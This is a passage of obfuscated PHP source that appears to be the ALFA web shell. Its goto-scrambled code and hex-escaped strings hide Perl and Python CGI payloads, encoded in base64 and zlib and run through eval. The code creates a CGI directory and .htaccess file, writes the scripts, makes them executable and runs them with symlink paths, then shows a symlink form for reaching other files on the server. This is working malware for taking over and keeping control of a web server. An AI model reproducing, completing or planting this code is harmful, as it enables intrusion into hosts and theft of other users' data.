x57\x4c\165\71\x79\115\123\115\132\x6a\x47\x4d\171\x53\125\112\x41\x76\x2b\71\x6c\x70\156\x39\146\166\163\170\x76\x76\x37\x35\114\x59\170\166\x61\141\x59\64\161\112\155\104\x57\x44\104\151\x4b\132\x55\x69\x44\x35\x64\125\170\x59\71\x38\61\167\x31\x2b\x76\162\161\67\x2b\146\120\x71\x72\57\x6a\164\53\x37\165\142\63\62\53\166\162\155\53\x43\x48\x6c\150\x57\x4d\164\57\x4a\x4e\127\71\172\105\x41\x43\124\x65\170\162\x42\163\112\x44\113\170\x64\120\x39\143\106\x71\x75\x4f\x4e\63\x67\114\x73\x33\x6d\116\x41\x72\141\x62\143\142\x6e\132\x4d\x45\61\x38\156\x51\114\157\x56\101\60\62\x4f\x47\154\x4f\x39\164\x67\x73\x69\127\x35\130\163\x75\143\126\103\x6f\115\x49\142\101\x67\126\x63\x42\123\171\x52\115\144\105\x43\106\112\106\65\167\157\161\x46\x36\107\161\x5a\161\x6e\x45\115\x34\147\x34\152\x71\x4a\143\x72\x72\151\x4c\105\170\105\120\x67\71\66\x68\117\141\115\126\106\x54\101\66\x34\x69\x65\141\112\132\x53\170\x56\x55\x55\x39\110\x6f\x31\156\x55\107\x30\x46\x43\x73\145\146\126\x6f\x72\114\152\x39\x48\x78\x58\x71\x57\x70\x55\155\70\x31\113\x73\x4d\110\107\147\102\116\65\x68\121\151\71\170\71\x38\117\142\x44\x39\122\x2b\x2f\63\162\x79\x2f\151\x33\x2f\x2f\70\117\105\x75\x6d\111\141\161\x79\106\x49\116\x4b\157\x49\x65\x37\x4b\x6a\150\102\x67\x62\x6b\x43\x77\164\x52\x77\x48\141\x33\x36\x6d\x4f\x76\x38\60\122\x35\150\123\143\161\x49\103\143\x45\x2b\x63\x4f\57\122\x5a\160\x33\153\142\x72\x58\x4a\x31\132\123\172\64\x5a\167\x52\x52\x2b\65\154\164\x31\105\162\110\120\144\x4a\x30\x79\x73\x61\112\x72\x33\103\146\114\x33\x53\x62\x4a\x68\x36\115\x31\x53\66\x77\x4b\x44\152\53\x39\x52\x46\x41\127\x6e\103\150\x67\x73\x5a\x63\57\x45\60\157\65\116\x4f\x4f\71\57\170\x47\x63\x61\x59\x42\x41\x63\x58\53\x64\166\53\153\x52\x56\x49\154\116\111\x54\x4a\x70\170\x43\x51\x35\x74\117\105\154\157\x72\x73\x6b\70\x68\130\x68\x61\67\x6a\101\x4d\147\x31\64\x48\63\112\x51\160\x4c\x41\x52\x6a\114\131\x6e\x53\165\64\x78\x66\144\152\124\x66\66\x6a\x4f\111\x37\x79\111\x66\112\x54\x7a\130\130\x46\x35\60\x4a\155\120\116\x4a\165\x4f\x35\101\115\x70\x45\x5a\x45\x4a\145\x64\x6c\67\x66\x77\x6a\x4d\x59\144\151\x62\x57\117\x75\116\x4f\x37\172\x51\131\122\x30\147\60\107\x55\144\111\x72\x31\155\x44\x79\111\x7a\x50\x4e\x51\161\153\132\x43\x6e\x35\57\x4c\112\x6a\53\144\x46\60\x59\117\x38\x51\x44\x59\156\x49\71\x57\125\x6e\156\155\125\60\146\x2b\167\143\x4b\102\60\115\x72\163\x37\x50\102\61\x36\x70\x43\60\x6c\116\113\x79\60\61\116\x31\x68\67\145\x2b\x73\x5a\115\x64\x72\110\x78\150\x37\141\126\x46\x55\103\x30\x47\111\126\161\x4e\x30\161\123\57\x50\x48\103\115\x66\x46\x7a\x6e\62\106\x65\x71\164\x64\x44\x47\x44\63\124\157\x50\157\123\x7a\65\x41\62\x4f\x44\160\124\x44\65\141\57\151\120\142\111\x79\60\156\x6b\x4b\60\x6d\x57\132\151\x49\x6e\x52\160\146\x63\161\165\x64\x4b\71\160\x36\x4b\x51\111\163\60\124\171\x57\x6e\114\114\x59\126\111\x38\x76\x39\x6c\141\161\x59\x73\x68\x30\x76\x61\132\x5a\117\x66\x56\x45\x5a\x55\x6c\x6b\x34\141\x52\x6c\x34\x79\147\x32\x4f\x54\x63\106\64\155\x61\65\154\x46\103\152\x35\x61\146\156\165\121\145\115\x41\x49\117\x34\143\x6d\115\62\x51\172\x65\124\x78\171\x78\x56\x32\x6b\x33\126\161\164\61\x77\x6d\145\x54\143\x4d\x38\x58\x4a\120\104\x62\142\x4c\x32\147\104\166\141\61\123\x6b\171\x68\x34\x33\x6f\101\120\x49\124\111\142\107\x69\172\111\154\153\x56\x6a\143\155\x4e\145\x71\x63\151\116\103\x43\x2b\x71\x6b\161\x56\103\x4e\x4c\131\122\x54\x4a\103\x77\125\x55\x6f\154\x70\x6c\153\117\x68\116\x56\141\x5a\155\127\x30\x39\165\x4a\x73\111\57\x2b\163\66\104\114\x55\x6c\157\x35\x6e\x78\63\101\x35\x65\152\x6b\x6d\x4c\162\x4a\122\x66\123\145\120\157\156\117\x34\172\x38\x36\161\154\x34\x50\155\x58\124\147\x4f\x6d\154\x50\65\125\163\x77\x61\x39\x37\167\145\x79\x6c\x4c\66\126\62\x33\x76\x73\x2f\106\67\116\157\x30\x4f\111\147\164\170\x4e\122\120\111\144\160\104\145\114\x52\116\x77\x45\165\x41\65\x76\x6d\110\102\122\x65\166\x6c\x67\x44\x75\x79\x72\x30\x72\x41\65\x32\x31\x77\62\117\x74\x4b\156\116\172\147\x50\x4f\x49\171\x35\157\x41\x39\x53\x30\164\x30\x78\x6e\66\x44\x7a\x49\122\153\x48\x44\102\x6b\62\120\x48\101\117\157\x50\x4b\127\x30\x67\101\x58\x33\x5a\x6d\x38\107\x58\x30\145\x6d\x43\x65\x69\170\x56\x67\125\x4a\161\120\x42\x6f\x53\x75\x74\124\x41\x41\x76\x67\122\x4c\x4a\57\x38\142\x35\x72\x38\x39\x41\x73\x74\107\131\x48\x35\152\125\x6b\x79\x39\x54\117\172\x42\53\x41\x2b\101\x34\123\53\x53\116\157\117\x6c\102\60\x72\x34\x63\130\67\116\102\116\163\x68\x62\162\141\x32\105\x4f\x6f\x68\x76\x4f\x63\121\x64\x4e\x77\132\101\x69\x65\154\x32\141\106\171\x4c\64\x45\101\x58\x79\107\x41\144\x6c\162\131\172\x4b\113\115\x53\x61\66\x55\x57\70\x45\132\125\x79\x61\x59\x45\x66\145\x76\70\112\x6d\x69\x36\x42\x5a\101\x66\113\x7a\65\x71\x72\102\x74\x47\x57\x5a\64\105\71\x53\132\66\x56\x72\71\x31\x33\157\152\x65\102\x53\x6e\115\154\x6d\103\102\x41\x6b\x57\x6d\x48\107\x33\105\x33\x37\67\64\x7a\70\103\104\x41\x75\66\115\x4f\157\106\x35\106\x4f\156\x62\x77\170\170\x57\101\x4c\x69\114\113\125\124\125\x54\x50\x58\172\x6f\145\x59\x41\60\x56\63\x36\x4f\x68\x35\x70\141\60\x46\x6c\x61\x54\x54\x33\x4f\x4e\x50\x74\x56\103\112\x63\x43\116\111\65\121\113\101\x48\x4e\161\x77\153\x4d\x32\x43\x50\x6a\150\157\x70\127\x46\x72\x68\x6f\66\147\172\x2f\x74\167\141\x64\x73\x64\170\53\67\71\120\x75\x6a\x70\x50\x48\x66\120\x71\141\x31\x71\x76\64\x77\167\156\107\x49\150\156\107\142\x46\132\x70\x30\171\142\101\x6d\x56\160\x72\x72\151\147\70\x38\x59\106\156\160\x68\163\x54\x48\x78\144\102\64\x32\101\70\107\x7a\63\x74\x62\x6e\x71\x32\154\107\x4e\x53\62\x54\x77\142\132\53\x49\x2b\x63\x31\x65\x41\111\x47\x64\112\x47\x69\122\x38\x62\153\x76\105\106\117\66\121\x41\123\x33\121\x2b\155\x37\146\x32\167\x6d\x74\x6e\x68\61\x45\165\162\147\x36\70\124\x74\163\x63\x2f\156\x4e\142\x7a\70\125\152\121\131\110\53\65\154\156\143\x4f\x69\x6b\132\154\161\147\x42\151\107\114\x76\166\x7a\x36\144\157\x2b\166\145\x44\121\127\x4e\x30\141\150\x72\x4b\x4c\x74\111\x75\154\x4a\62\166\x62\124\132\x38\x61\x44\65\110\x2f\155\x79\x72\x6c\70\x47\x4a\172\167\117\162\70\57\x75\160\x37\x33\x66\102\x49\x30\144\145\113\x35\x52\x58\150\x77\142\x58\122\x44\x6c\x74\132\x52\162\141\160\150\x6f\x79\60\x63\124\112\x79\x6e\113\151\x44\x67\101\146\142\167\153\110\64\x63\104\x37\122\x58\x58\x38\x6a\x46\x77\155\x35\62\172\x2f\x65\x44\x41\147\x59\x5a\111\142\x51\115\114\111\161\x68\x31\x4d\x51\111\x69\x76\57\127\63\112\131\167\170\142\x57\146\70\116\x31\166\x68\x67\x35\57\110\130\126\162\162\112\x63\x38\143\x46\64\152\171\x6a\106\61\124\160\x39\x43\163\x48\65\x65\x36\64\104\106\x47\161\171\x48\165\x51\130\x2f\x49\145\x37\x44\x6d\155\x78\x30\106\x55\66\x76\114\114\53\160\113\126\x53\150\170\x55\x6d\x33\111\x57\71\101\116\x7a\67\110\x6d\163\x4d\x4e\53\61\146\x49\x36\x68\142\114\103\155\157\110\x6a\x73\166\160\x45\x7a\101\70\146\167\110\120\141\x4a\x48\x6a\x47\121\x37\110\x34\167\113\x74\155\156\x75\x4a\x48\x57\x67\x72\x31\x70\x62\x79\x2b\x62\62\x63\123\104\x76\104\165\170\x53\x76\x72\x4f\x7a\x6c\157\x55\x67\121\152\62\164\106\x52\132\x42\x6d\121\57\x48\151\x31\x33\x48\144\164\66\103\123\67\142\x7a\106\x33\115\112\x4b\x59\130\x75\x53\127\x6e\154\71\x36\122\x4b\160\120\113\x7a\161\67\155\x58\125\147\x4c\141\102\x52\131\154\x38\63\113\127\x76\130\x30\x2b\x79\x64\102\160\142\163\x73\x77\x4f\x66\125\x56\71\160\162\66\x4e\x55\121\x42\154\146\124\x70\127\111\x62\x68\x58\161\x50\63\147\122\153\x6c\123\x47\x4f\x2f\170\153\172\141\152\x47\x6f\x69\71\170\63\x32\x4c\x63\163\x6b\x54\x32\x53\x34\x59\62\71\x43\x78\172\x4e\143\x4b\x63\102\151\x32\x4a\124\112\130\x46\x73\151\152\127\117\x45\122\x54\152\107\x4d\107\x67\x39\x6e\x64\103\162\146\117\65\x42\x6a\165\150\117\172\156\x54\x75\x34\x4b\x50\103\x50\x59\163\105\144\67\x6e\x48\x2f\113\110\x66\x49\171\x44\x79\x64\x69\x64\x2f\x36\x6b\107\x4a\x64\143\x43\x77\x7a\x7a\x62\153\141\x74\x33\164\x31\x66\x6b\152\154\57\71\x43\x75\x72\x4e\x79\164\x68\60\120\122\120\66\171\142\x51\71\152\103\x64\103\125\x6e\x4e\x77\65\x46\x41\164\106\65\57\110\153\x56\60\x66\122\61\x59\143\x6d\x6b\x35\155\151\66\161\x39\163\x57\61\111\125\x42\x72\x57\107\x62\x50\60\x79\x62\x56\123\147\104\155\x4d\160\146\154\x69\116\102\x77\125\x32\167\166\x58\x65\x70\x33\x4e\x68\x4e\132\x69\132\x65\x64\x73\64\x7a\131\x61\106\154\x74\x41\x63\67\x55\x45\x47\x31\x2f\x50\x7a\x58\120\x68\165\162\x62\x35\63\x48\x52\x74\170\172\60\132\x39\x6a\164\156\x47\65\64\165\154\x6e\157\60\105\170\x6d\172\105\171\x72\71\150\64\57\x4f\146\167\104\112\121\x65\127\x7a\105\164\x41\x69\x4b\163\x72\x49\116\x37\104\x6e\x54\x36\154\x4b\x73\x57\130\70\x6c\67\x6a\127\x69\x66\x79\60\x49\x37\x2f\164\x39\x46\114\153\x34\167\x68\x4d\x6e\70\x44\x56\x33\65\x33\x46\x65\x4f\124\165\106\117\x78\x79\116\65\101\162\x63\x69\x62\156\160\x48\142\132\116\142\125\116\106\x4a\147\x69\53\110\x64\107\164\61\116\142\67\x4c\152\106\132\x49\156\63\x67\157\115\x56\x4c\71\x6c\x65\x58\64\115\x49\x57\64\x72\152\x6d\67\117\x68\x57\x32\161\x61\112\117\64\x6f\145\155\63\x39\101\127\163\x2f\x6f\x6a\x38\146\x6a\124\71\x76\166\x54\70\x50\53\121\x64\172\63\151\x75\131\x59\x6e\167\114\142\x66\x6d\x74\171\x44\113\170\x41\x53\x66\x66\147\x55\152\61\x6b\x4c\x38\170\106\x79\131\x68\x64\x34\142\101\102\115\x58\170\150\x67\x55\153\x7a\105\116\53\x78\144\147\x64\x4a\x4a\x50\116\112\x55\101\170\x71\x49\x39\x69\127\122\102\115\x4a\166\172\x42\x6a\53\x39\111\x59\132\x4d\x4d\141\110\x2b\102\167\171\x57\104\131\57\162\114\x35\112\x67\x63\161\x2f\113\x61\105\110\x71\x6e\x41\103\x41\63\160\x79\x61\115\161\63\x41\152\x55\70\62\x37\146\x73\130\x4f\112\132\154\x51\x2b\x46\x64\x69\x75\66\x6c\71\x65\165\x6c\x36\164\167\x38\x6e\x74\x62\70\x4b\x67\x75\157\x69\x79\x70\165\x57\x33\132\x30\123\61\147\57\142\161\104\67\x65\x54\x65\x72\x33\x44\160\165\106\125\x44\60\106\x7a\146\63\106\167\x61\x61\x73\65\x41\x77\x75\104\103\146\x51\x76\53\115\x61\106\111\x34\152\x78\126\x59\101\x68\x50\x77\x48\112\64\x5a\163\144\x41\x3d\x3d\x22\x29\x29\54\47\74\x73\164\x72\x69\156\x67\76\x27\x2c\x27\x65\x78\145\143\47\51\51"; goto zct_9; Bs8PW: $perl = "\43\41\x2f\x75\163\x72\57\x62\x69\156\x2f\x70\145\x72\x6c\x20\40\x20\x2d\x49\x2f\165\x73\162\x2f\x6c\x6f\x63\141\x6c\57\142\x61\x6e\x64\155\151\x6e" . "\xa" . "\165\x73\x65\40\x4d\111\115\105\x3a\72\x42\x61\163\145\66\64\x3b\x75\163\145\40\103\157\155\x70\x72\145\163\163\72\72\132\x6c\151\142\73\x65\166\141\x6c\x28\103\157\x6d\160\x72\x65\163\x73\x3a\x3a\x5a\154\x69\x62\x3a\72\x6d\145\155\x47\165\156\x7a\x69\x70\50\x64\145\x63\x6f\x64\145\137\142\141\163\145\66\x34\x28\x22\110\64\x73\111\x41\101\x41\101\x41\101\x41\101\57\x35\60\x59\x43\61\120\x61\x53\120\151\x76\x62\106\117\165\123\x56\162\112\147\x32\161\x31\x42\106\x44\117\141\163\53\x5a\164\x74\65\125\62\65\x73\142\x38\132\150\116\x64\x6f\x48\x55\153\117\x53\171\x43\x30\x4b\122\57\x76\x62\x37\71\x70\105\131\x46\127\x33\156\115\x6d\120\x59\172\x58\67\166\71\x7a\160\152\x46\x45\x56\132\x79\x6a\x68\x4f\117\x54\157\x35\107\170\x36\53\x50\60\110\x64\110\161\x4b\114\x6d\110\x47\107\107\153\x65\x66\166\x71\x37\115\x39\x2f\x33\172\157\x37\x2f\x36\146\167\x39\120\120\160\60\146\146\124\67\x75\x48\x78\x36\132\66\62\x43\x36\122\111\x31\x35\x79\x30\144\144\x5a\102\150\161\105\x36\x70\x31\120\105\113\127\x6f\155\117\x6a\x56\x56\67\105\x51\x4e\131\64\x7a\x46\112\x4f\125\71\67\x6b\171\65\171\62\x45\x61\x63\114\67\x6b\67\x34\x4e\x42\x6d\x6b\x67\x37\x51\152\106\x72\63\x4f\x68\107\114\x53\66\57\x43\x59\x4a\67\x52\63\x6d\102\106\113\125\x4c\x68\105\57\x51\57\x48\146\130\x52\117\53\x78\70\x37\x72\x6a\162\x70\x4d\114\x36\x45\110\67\167\123\112\112\x71\105\122\x6c\155\102\x65\x5a\171\154\67\124\x52\114\x61\x62\x44\x75\165\x4f\161\x38\x34\171\x70\171\x59\x55\x61\127\113\x42\x78\x48\x57\x5a\x49\126\130\146\x4f\x35\x4a\170\53\x7a\x5a\167\x52\x4b\114\114\x4e\104\x34\x6a\155\x53\x4b\x46\60\x6a\x78\x34\x54\x45\66\142\x6a\164\145\x2f\153\151\x43\113\x61\x34\x47\115\x64\160\115\x38\167\64\172\x36\142\161\127\x35\147\x56\x68\102\x5a\x74\x50\61\70\147\147\164\x6b\105\x4a\x48\x77\x2b\x6b\x6b\70\x67\x36\142\x64\x68\112\70\x67\110\x55\152\x53\143\x78\x4f\x4f\x30\110\131\110\117\x74\x41\x68\x47\x6f\110\63\x7a\155\x73\x62\152\103\x57\x2b\x48\127\x55\114\x55\102\x78\132\57\x70\53\x33\x57\x47\x36\x42\163\63\107\x72\x4d\163\157\121\151\x68\x67\x6c\66\x67\x65\112\x30\110\162\115\x34\150\120\60\x50\144\x4c\x61\x63\x4a\156\106\x36\150\130\65\x66\x6f\152\71\160\153\130\122\x63\105\x4c\170\x6e\x42\x6d\x75\141\115\x4c\x72\x53\142\155\152\60\x50\67\x2f\57\145\x75\106\144\102\164\x6f\124\60\124\x6a\x47\x79\x51\151\x37\x52\x72\x42\x6d\163\170\104\x49\104\x58\106\x52\x34\x43\x56\x61\x67\x62\x4d\163\167\x50\107\62\x47\x6e\x50\x66\x73\167\110\x30\131\103\147\x63\x2b\x4e\x76\x63\x48\70\x46\155\151\156\x4f\60\141\147\170\106\x44\120\150\x72\144\x43\x41\101\147\64\x4c\x79\x57\x5a\105\151\x53\167\x55\x46\x49\120\165\x6a\154\125\x42\x65\62\x2f\x61\53\x33\x2f\x59\125\x67\x2f\171\x61\x6c\114\124\x66\141\113\162\170\x79\110\x71\x6d\x51\62\x47\x6c\x61\121\x68\x68\x67\172\x55\x63\x41\102\x53\151\x2f\x79\113\104\170\101\127\116\x75\x46\105\102\107\x4f\64\153\155\x31\112\63\x4e\127\x4f\60\x57\114\166\x35\x4c\105\172\x69\141\x43\150\151\x52\x43\x67\x43\145\105\x30\x4b\111\x4a\x52\x48\x62\157\x71\156\154\x44\147\121\165\151\x4d\104\166\x58\x69\102\x6d\153\122\x2f\156\64\x50\x74\x4d\x61\x50\x4d\57\125\127\x61\102\171\170\120\x59\147\64\103\x79\x31\x2f\114\x48\142\x6a\x75\x6c\x6f\x70\67\x34\x39\x33\160\64\132\145\120\122\65\57\117\150\x35\x39\x50\124\x38\53\116\x74\x61\63\x69\146\102\x64\147\70\171\170\x48\103\x6a\x47\x6f\x4c\x54\x57\67\142\61\155\x63\x57\x6f\x5a\162\142\x4f\x6e\x76\x74\x67\115\x53\141\x4f\x59\x47\x63\x6f\x43\x43\163\x74\147\125\x58\61\x46\x65\x6c\105\x62\x62\x42\x71\65\172\113\154\67\x2b\156\156\x6a\166\141\103\120\x71\x46\x4f\157\101\x70\x41\x70\x56\x38\62\107\105\155\132\101\66\105\x4f\x38\x69\162\154\x41\132\67\143\x66\x77\145\x44\x35\105\x4f\172\x44\x63\x64\x6f\x79\x4f\x4b\x30\64\x68\x4e\121\121\147\112\170\164\157\112\130\x54\105\102\123\x57\x4d\x4a\x67\125\144\x64\125\x33\x44\x41\x61\155\157\x64\116\114\x46\x76\156\147\x75\x44\x62\x53\x50\172\107\71\x34\x6a\154\154\x55\x78\x44\154\x76\x34\x34\x51\x57\x33\104\x4b\x75\157\x59\113\x49\x36\152\107\x4b\125\64\x4a\111\x4e\x73\126\170\66\152\151\117\x59\x5a\164\x74\x5a\105\x34\x34\x7a\x39\x75\x75\x61\x34\x49\121\x31\110\x59\115\105\x33\x48\x49\114\x4d\161\67\x35\152\x42\115\143\110\160\x6c\x33\150\x50\141\x38\57\161\164\x6c\161\145\105\160\152\127\150\x63\123\x58\x34\x42\x69\62\120\152\x78\x57\x43\166\57\144\x41\x7a\x62\x6f\x32\x6b\x42\145\117\x49\126\113\103\x71\x57\x78\171\170\124\x71\x48\144\110\x4c\64\147\x6f\166\x6a\110\x63\144\x77\x66\171\x59\x67\x32\106\x54\x57\105\x4a\62\122\104\x77\x52\x30\x65\x64\110\x54\x47\125\145\171\111\130\x43\x36\x6e\170\115\x79\150\x50\172\x58\111\157\x61\165\151\x66\x77\165\x50\150\63\x4d\x2f\x52\x33\x34\132\117\x6c\x4e\126\x46\165\x2f\162\x74\x61\x4e\117\x59\107\x31\162\60\156\101\x30\x6c\120\x4c\x74\67\144\114\67\63\142\160\x4b\x34\150\141\161\x73\155\x4d\x67\141\170\x51\x78\64\113\110\57\150\122\x6b\117\x59\x58\x30\x4a\160\x35\167\110\x64\164\x43\65\162\x30\x45\115\x32\x32\x55\x46\x52\x56\117\155\127\x42\107\157\113\x58\165\x61\115\122\145\105\103\125\x5a\164\102\x4f\71\x56\141\167\x42\x52\57\103\x75\x6b\x45\162\62\x51\155\152\x7a\142\x73\113\x61\125\147\64\x6f\103\105\x67\x31\x6c\x39\141\x57\101\x6c\123\70\x64\66\130\x75\x6d\155\126\x42\x52\142\153\165\112\116\123\x64\143\x38\126\172\71\171\66\130\117\x53\x36\x55\x4e\153\71\172\x38\110\x2f\103\x77\123\x38\65\x50\102\x4d\142\145\x36\127\143\101\117\125\115\110\x71\x6a\x45\x6d\x34\x72\x61\x52\163\x50\117\64\x34\114\x50\143\x4f\x4b\161\126\115\x6d\x75\x55\61\x71\x77\171\x73\x52\x33\150\110\152\141\163\162\x37\x57\143\x71\57\155\x39\x4a\x70\132\116\x5a\x63\x6e\144\x64\x37\x54\63\x4b\x4b\x4e\107\165\57\144\155\156\x53\166\61\x45\130\x61\x38\146\105\x51\x49\126\111\127\122\x62\101\152\152\60\166\132\65\x61\x5a\161\x57\132\x36\62\x6e\x4e\66\x2b\61\144\x74\x4b\163\x53\160\53\102\126\x63\x72\x78\64\x78\x64\x56\x31\x7a\x56\67\x68\x47\x4c\x71\x63\116\145\111\x46\167\102\167\141\x71\x32\122\x6e\x42\x4c\x57\x64\144\124\x58\x51\x54\x51\x55\x56\106\153\x68\123\x68\x58\127\x72\x53\x71\x33\107\x4c\122\145\154\130\x54\x37\x35\x71\53\x57\x52\x62\115\x45\105\144\130\64\171\x4b\142\x70\x61\x53\160\x2b\67\x34\x61\x4b\57\124\x49\x30\x50\x59\121\156\166\x46\115\126\x6d\121\x39\60\57\172\120\165\166\x33\171\x51\123\156\142\127\103\x6e\x66\x79\123\x42\151\124\x77\117\x58\126\x66\111\114\x39\x4b\x43\x66\147\x6d\64\x75\143\x47\126\170\x67\65\x66\127\x53\60\x78\130\125\x4f\x73\x61\x43\x32\156\57\125\x51\x62\170\x45\60\x31\153\153\x41\105\151\x52\132\142\167\x69\114\x32\x4b\157\120\130\x6d\117\152\x6a\106\x58\x43\111\x50\x39\122\67\130\160\x6b\145\146\154\117\120\152\147\x33\161\x6c\x4d\x77\66\103\x51\150\x4c\x75\x2f\x6b\x42\124\61\63\x6d\x35\x2f\x78\x31\x6d\120\155\x52\x59\x73\114\x49\116\x74\x48\x4b\104\153\x6f\x47\x76\x50\x57\156\x56\x4f\x64\x6f\103\152\x62\153\x4f\103\x56\x31\63\130\101\126\141\113\x50\153\x41\x69\170\122\x63\x63\62\143\163\x55\x62\x7a\x52\x7a\x51\x30\161\166\71\x51\x71\127\x42\63\132\60\125\104\x6c\x31\x71\x6d\x6f\x4b\142\126\x6b\106\x4e\x34\x62\x54\x45\123\166\x43\x67\115\61\172\101\147\x51\x47\145\67\x43\107\x4e\x42\x34\70\x75\x74\x5a\x54\x43\x77\x4c\65\156\106\x75\x79\x54\120\x37\x59\x76\x76\123\x31\151\157\x70\x77\x6d\161\164\x75\147\141\x39\110\126\172\141\131\155\x36\x52\165\x67\x61\141\x48\x50\x78\121\116\122\105\161\x51\x34\x69\164\146\x36\154\x4d\x2f\106\x59\x79\x46\x58\164\154\155\130\70\107\67\x4e\125\x4e\57\x44\x57\x45\146\x65\162\x34\x76\163\121\x58\x64\x44\131\104\150\x6a\126\x47\144\x51\166\161\172\x43\165\x74\x52\123\71\141\154\66\151\104\x64\x6a\171\166\164\111\57\107\x72\131\x59\114\61\145\65\62\x61\x35\x50\131\127\163\61\151\x30\103\x36\154\123\161\x54\x6b\x74\110\115\112\156\126\160\x59\x63\126\x64\x49\126\x7a\x6f\x54\x62\63\x53\155\151\112\106\x4b\106\x4f\x75\x57\171\155\x73\x64\x45\130\157\165\105\x2f\147\151\115\x43\121\x57\105\121\x50\x6c\120\124\x32\125\x6c\x37\62\171\x73\127\172\114\x34\154\x51\120\145\151\x68\65\105\x50\x4c\122\156\x59\x68\x76\x31\x51\111\143\61\x2b\x4b\x62\x61\113\x74\x45\x6a\x77\127\172\x63\105\x35\114\x42\142\117\154\x55\x42\x75\x2b\106\x6e\x6a\x67\63\101\x79\x61\164\x53\x44\62\x4b\164\x68\65\126\101\x47\104\110\x50\x65\150\112\130\101\x4c\147\x47\x58\x44\107\123\132\121\172\x4c\x73\x49\x33\x6d\x4d\53\x6b\x64\141\172\125\x56\120\x4e\x46\164\130\x49\101\x52\x67\167\170\172\102\145\171\x50\x4d\x74\65\111\x45\166\x4b\155\122\x62\x47\x4b\143\x36\146\x6e\x41\161\x46\123\x7a\166\x48\116\131\101\x61\x45\160\x48\131\x67\x66\60\x71\x42\112\x45\172\x72\71\x57\131\x79\107\x4f\126\106\x76\103\x38\153\63\x41\63\131\164\130\x72\167\112\164\132\172\57\111\x5a\62\x78\x69\61\x57\x69\x41\110\x71\x4c\162\66\x73\113\x77\104\x55\x36\x35\112\x56\130\106\x30\x77\x61\103\117\x6e\x55\x65\x45\x77\x30\103\x63\162\116\167\146\x72\151\x42\x32\101\x4f\150\101\102\x73\x34\154\101\x33\x45\x56\121\125\x53\x66\x6b\125\x6e\105\125\120\x68\x65\x6e\157\x46\x2f\144\127\x71\172\x36\x41\x67\160\x4c\x65\x37\x73\66\120\110\117\61\x2f\107\171\63\x4e\x31\107\64\123\67\63\x70\x6d\x34\x44\x5a\67\112\62\53\102\112\145\x52\163\143\160\113\145\x35\x75\x50\111\171\53\x45\124\157\147\152\112\60\156\x43\x56\x4a\x64\147\63\x31\x2b\147\x4d\x51\x5a\111\x50\60\156\x52\167\53\163\x6d\111\x70\x41\145\123\126\x55\x75\115\66\x4f\126\x78\66\x42\x6d\x6d\x66\153\110\x4f\64\x69\x4b\x74\x37\x65\x4a\x35\101\x2b\x30\x44\x35\112\102\144\57\62\60\150\101\x4a\101\x68\x65\123\106\x33\121\101\x66\x59\120\156\x42\x49\131\x39\x48\70\x42\130\x45\146\66\x53\115\62\124\163\101\x42\x76\x39\105\104\106\x4f\x31\117\63\x4d\53\105\64\x69\151\150\152\65\124\125\143\x77\x6e\x65\x30\x6c\x74\162\x72\123\x55\x46\x51\60\x4e\x44\161\x47\x76\x58\64\61\x43\66\x44\71\x46\154\61\112\71\x77\x30\x57\x55\110\x61\161\60\156\x63\113\x68\x75\113\x4c\161\142\x6c\61\63\x4a\131\x6b\x79\154\123\x58\154\143\162\114\x32\157\156\171\x76\71\x53\147\x41\x2f\57\x41\63\121\x72\65\166\x63\x76\105\121\x41\101\x22\x29\x29\51\73"; goto NHXca; Lql6i: if ($_POST["\141\x6c\146\141\62"] == "\x73\171\155\x70\171") { goto hnlp1; hnlp1: $cginame = "\160\171\x73\x79\155\x6c\x69\156\153\56\x61\154\x66\x61"; goto KGOTj; dLYyv: $lang = "\160\171\164\150\157\156"; goto JMtXW; KGOTj: $source = $py; goto dLYyv; JMtXW: } goto beFqR; vRkFC: $lang = "\x70\145\x72\x6c"; goto Lql6i; C5ioi: $source = $perl; goto vRkFC; ZuD3A: alfacgihtaccess("\x63\147\151"); goto Bs8PW; Aprwr: @chmod($cginame, 0755); goto XnaGI; beFqR: @__write_file($cginame, $source); goto Aprwr; zct_9: $cginame = "\x73\171\x6d\x70\x65\x72\x6c\56\141\x6c\x66\x61"; goto C5ioi; ekKg_: @mkdir("\x63\x67\151\141\154\x66\141", 0755); goto a8LPj; a8LPj: @chdir("\143\x67\x69\141\x6c\146\141"); goto ZuD3A; Ya7an: $resource = alfaEx("{$lang}\x20{$cginame}\40{$sympath}", false, true, true); goto tJTcG; CUPvn: $sympath = alfaMakePwd(); goto ekKg_; T8qCL: } goto n77rY; BCTc0: alfahead(); goto lVFYV; lVFYV: AlfaNum(9, 10); goto lCIzh; K33Os: echo "\74\x2f\x64\x69\x76\76"; goto p8BGD; n77rY: if (isset($_POST["\x61\154\x66\x61\x34"]) && $_POST["\x61\x6c\x66\x61\64"] == "\123\x79\155\x46\x69\154\145") { if (function_exists("\163\171\x6d\154\151\x6e\153") || _alfa_can_runCommand(true, true)) { goto foYFe; JtPlr: $path = $_POST["\x61\x6c\146\x61\65"]; goto SjeaK; foYFe: AlfaNum(9, 10); goto oVCFs; oVCFs: echo __pre() . "\xd\xa\x3c\143\x65\156\x74\145\x72\x3e\74\x70\76\x3c\x64\x69\x76\40\143\x6c\x61\x73\x73\75\x22\164\170\164\146\x6f\156\164\137\150\145\141\144\145\x72\x22\x3e\174\40\123\x79\x6d\x6c\151\x6e\x6b\40\106\151\x6c\145\40\x41\156\x64\40\x44\151\x72\145\x63\x74\157\x72\x79\x20\x7c\74\x2f\144\x69\x76\x3e\74\57\160\x3e\74\x66\x6f\162\x6d\x20\157\x6e\x53\x75\x62\x6d\151\164\x3d\42\x67\50\47\x73\171\155\x6c\151\x6e\153\47\x2c\x6e\165\154\x6c\x2c\x6e\x75\x6c\154\x2c\x6e\165\x6c\154\54\156\x75\154\x6c\54\x27\123\x79\x6d\106\151\154\145\47\54\x74\x68\x69\x73\x2e\x66\151\154\145\56\x76\141\x6c\x75\145\x2c\x74\150\151\x73\56\x73\171\x6d\x66\x69\154\145\56\166\x61\154\165\x65\x2c\x74\150\x69\163\x2e\163\x79\x6d\x6c\x69\156\x6b\x2e\x76\x61\x6c\165\145\x29\x3b\162\x65\164\165\162\156\x20\x66\141\x6c\163\145\x3b\42\40\x6d\145\x74\150\x6f\144\75\42\160\x6f\x73\x74\x22\76\xd\12\x3c\151\156\x70\165\x74\x20\164\171\x70\145\75\x22\164\145\x78\x74\42\40\x6e\141\x6d\145\75\42\146\x69\154\x65\42\40\x70\x6c\141\x63\145\150\157\154\144\x65\162\x3d\42\105\x78\141\x6d\x70\x6c\145\40\x3a\x20\57\x68\x6f\x6d\145\57\x75\x73\145\x72\57\160\x75\x62\x6c\151\143\137\150\x74\x6d\x6c\x2f\x